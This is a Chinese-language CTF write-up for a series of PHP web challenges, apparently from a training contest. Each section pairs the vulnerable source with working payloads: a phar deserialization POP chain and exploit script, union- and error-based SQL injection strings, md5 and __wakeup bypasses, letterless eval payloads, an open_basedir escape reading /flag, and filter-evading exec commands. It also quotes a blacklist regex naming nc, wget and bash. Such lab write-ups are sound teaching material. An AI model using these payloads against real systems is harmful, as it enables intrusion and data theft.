babyunser
phar反序列化
利用文件查看器直接读到三个文件
read.php
<?php
include('class.php');
$a=new aa();
?>
error_reporting(0);
$filename=$_POST['file'];
if(!isset($filename)){die();
}
$file=new zz($filename);
$contents=$file->getFile();
?>
<br>
<textarea class="file_content" type="text" value=<?php echo "<br>".$contents;?>
class.php
<?php
class aa{public $name;public function __construct(){$this->name='aa';}public function __destruct(){$this->name=strtolower($this->name);}
}class ff{private $content;public $func;public function __construct(){$this->content="\<?php @eval(\$_POST[1]);?>";}public function __get($key){$this->$key->{$this->func}($_POST['cmd']);}
}class zz{public $filename;public $content='surprise';public function __construct($filename){$this->filename=$filename;}public function filter(){if(preg_match('/^\/|php:|data|zip|\.\.\//i',$this->filename)){die('这不合理');}}public function write($var){$filename=$this->filename;$lt=$this->filename->$var;//此功能废弃,不想写了}public function getFile(){$this->filter();$contents=file_get_contents($this->filename);if(!empty($contents)){return $contents;}else{die("404 not found");}}public function __toString(){$this->{$_POST['method']}($_POST['var']);return $this->content;}
}class xx{public $name;public $arg;public function __construct(){$this->name='eval';$this->arg='phpinfo();';}public function __call($name,$arg){$name($arg[0]);}
}
upload,php
<?phpif(isset($_POST['submit'])){$upload_path="upload/".md5(time()).".txt";$temp_file = $_FILES['upload_file']['tmp_name'];if (move_uploaded_file($temp_file, $upload_path)) {echo "文件路径:".$upload_path;} else {$msg = '上传失败';}}
因为上传的文件会直接被改名且成为txt文件,所以不考虑文件上传绕过rce
pop链条
{aa __strlower} --> {zz __toString method=wreite,filename->$var} --> {ff __get,$key=$content=xx ,func=assert,} --> {xx __call, $name=assert,$arg=$_POST}
其中
(解析 phar:// 伪协议时,会将其内容进行反序列化,所以 phar 里面的内容传入恶意 pop 链)
file=phar://...&method=write&var=content&cmd=system('cat /flag');
exp
<?php
class aa{public $name;function __construct(){$this->name = new zz();}
}class zz{public $filename;public $content='surprise';function __construct(){$this->filename = new ff();}}class ff{private $content;public $func = "assert";function __construct(){$this->content = new xx();}
}class xx{public $name;public $arg;
}$a = new aa();
echo urlencode(serialize($a));# 下面这部分就没改
$phar = new Phar("phar.phar");
$phar->startBuffering();
$phar->setStub("<?php __HALT_COMPILER(); ?>"); //设置stub$phar->setMetadata($a); //将自定义的meta-data存入manifest
$phar->addFromString("test.txt", "test"); //添加要压缩的文件
//签名自动计算
==>
POST read.phpfile=phar://upload/f17682891b083ec486fe811956039270.txt&method=write&var=content&cmd=system('cat /flag');
easy_md5
数组绕过
if ($name != $password && md5($name) == md5($password)){echo $flag;}
数组绕过
name[]=1password[]=2
easy_sql
/?wllm=-1' union select 1,2,3--+
/?wllm=-1' union select 1,2,database()--+/?wllm=-1' union select 1,2,(select group_concat(table_name)from information_schema.tables where table_schema=database())--+
/?wllm=-1' union select 1,2,(select group_concat(column_name)from information_schema.columns where table_name='test_tb')--+/?wllm=-1' union select 1,2,(select group_concat(flag)from test_tb)--+
no_wakeup
wake up 绕过
class HaHaHa{public $admin;public $passwd;public function __construct(){$this->admin ="user";$this->passwd = "123456";}public function __wakeup(){$this->passwd = sha1($this->passwd);}public function __destruct(){if($this->admin === "admin" && $this->passwd === "wllm"){include("flag.php");echo $flag;}else{echo $this->passwd;echo "No wake up";}}}$Letmeseesee = $_GET['p'];
unserialize($Letmeseesee);
O:6:"HaHaHa":2:{s:5:"admin";s:5:"admin";s:6:"passwd";s:4:"wllm";}Change toO:6:"HaHaHa":3:{s:5:"admin";s:5:"admin";s:6:"passwd";s:4:"wllm";}
error
报错注入
?id=1' and updatexml(1,concat(0x7e,(select database()),0x7e),1) --+
?id=1' and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 0,1),0x7e),1)--+ ?id=1' and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name='test_tb' limit 1,1),0x7e),1)--+
这里涉及到flag显示一半的问题
?id=1' and updatexml(1,concat(0x7e,(select flag from test_tb),0x7e),1)--+
?id=1' and updatexml(1,concat(0x7e,(select right(flag,30) from test_tb),0x7e),1)--+
hardrce
取反绕过 rce
if(isset($_GET['wllm']))
{$wllm = $_GET['wllm'];$blacklist = [' ','\t','\r','\n','\+','\[','\^','\]','\"','\-','\$','\*','\?','\<','\>','\=','\`',];foreach ($blacklist as $blackitem){if (preg_match('/' . $blackitem . '/m', $wllm)) {die("LTLT说不能用这些奇奇怪怪的符号哦!");}}
if(preg_match('/[a-zA-Z]/is',$wllm))
{die("Ra's Al Ghul说不能用字母哦!");
}
echo "NoVic4说:不错哦小伙子,可你能拿到flag吗?";
eval($wllm);
}
<?php
fwrite(STDOUT,'[+]your function: ');
$system=str_replace(array("\r\n", "\r", "\n"), "", fgets(STDIN));
fwrite(STDOUT,'[+]your command: ');
$command=str_replace(array("\r\n", "\r", "\n"), "", fgets(STDIN));
echo '[*] (~'.urlencode(~$system).')(~'.urlencode(~$command).');';
hardrce_3
[参考][https://www.cnblogs.com/pursue-security/p/15404150.html]
自增绕过 rce
if(isset($_GET['wllm']))
{$wllm = $_GET['wllm'];$blacklist = [' ','\^','\~','\|'];foreach ($blacklist as $blackitem){if (preg_match('/' . $blackitem . '/m', $wllm)) {die("小伙子只会异或和取反?不好意思哦LTLT说不能用!!");}}
if(preg_match('/[a-zA-Z0-9]/is',$wllm))
{die("Ra'sAlGhul说用字母数字是没有灵魂的!");
}
echo "NoVic4说:不错哦小伙子,可你能拿到flag吗?";
eval($wllm);
}
//测试发现7.0.12以上版本不可使用
//使用时需要url编码下
$_=[];$_=@"$_";$_=$_['!'=='@'];$___=$_;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$___.=$__;$___.=$__;$__=$_;$__++;$__++;$__++;$__++;$___.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$___.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$___.=$__;$____='_';$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$____.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$____.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$____.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$____.=$__;$_=$$____;$___($_[_]);
固定格式 构造出来的 assert($_POST[_]);
然后post传入 _=phpinfo();
禁用了很多函数,但可以使用 file_put_contents
_=file_put_contents('1.php',"<?php print_r(ini_get('open_basedir').'<br>'); mkdir('test'); chdir('test'); ini_set('open_basedir','..'); chdir('..'); chdir('..'); chdir('..'); ini_set('open_basedir','/'); echo file_get_contents('/flag'); print(1);?> ");
这段代码的目的是尝试绕过服务器的 open_basedir
限制,以读取服务器上的某些文件(如 /flag
)。open_basedir
是 PHP 的一个安全设置,用于限制脚本只能访问指定目录内的文件。通过修改 open_basedir
的值并切换目录,代码试图突破这一限制。
<?php
// 获取 open_basedir 的当前值,并输出
print_r(ini_get('open_basedir').'<br>');// 创建一个名为 'test' 的目录
mkdir('test');// 切换到 'test' 目录
chdir('test');// 将 open_basedir 设置为 '..',即上一级目录
ini_set('open_basedir','..');// 返回上一级目录
chdir('..');// 再次返回上一级目录
chdir('..');// 再次返回上一级目录
chdir('..');// 将 open_basedir 设置为 '/'
ini_set('open_basedir','/');// 读取并输出 '/flag' 文件的内容
echo file_get_contents('/flag');// 输出数字 1
print(1);
?>
no echo rce
无回显 rce
if(isset($_GET['url']))
{$url=$_GET['url'];if(preg_match('/bash|nc|wget|ping|ls|cat|more|less|phpinfo|base64|echo|php|python|mv|cp|la|\-|\*|\"|\>|\<|\%|\$/i',$url)){echo "Sorry,you can't use this.";}else{echo "Can you see anything?";exec($url);}
/?url=tac /flllll\aaaaaaggggggg | tee 2.txt
然后访问 2.txt 即可
这种当然可以尝试反弹 shell
sql
sql fuzz,简单绕过,数据截取
/?wllm=-1'/**/union/**/select/**/1,2,database()%23
/?wllm=-1'/**/union/**/select/**/1,2,group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema/**/like/**/database()%23/?wllm=-1'/**/union/**/select/**/1,2,group_concat(flag)/**/from/**/LTLT_flag%23/?wllm=-1'/**/union/**/select/**/1,2,mid(group_concat(flag),20,40)/**/from/**/LTLT_flag%23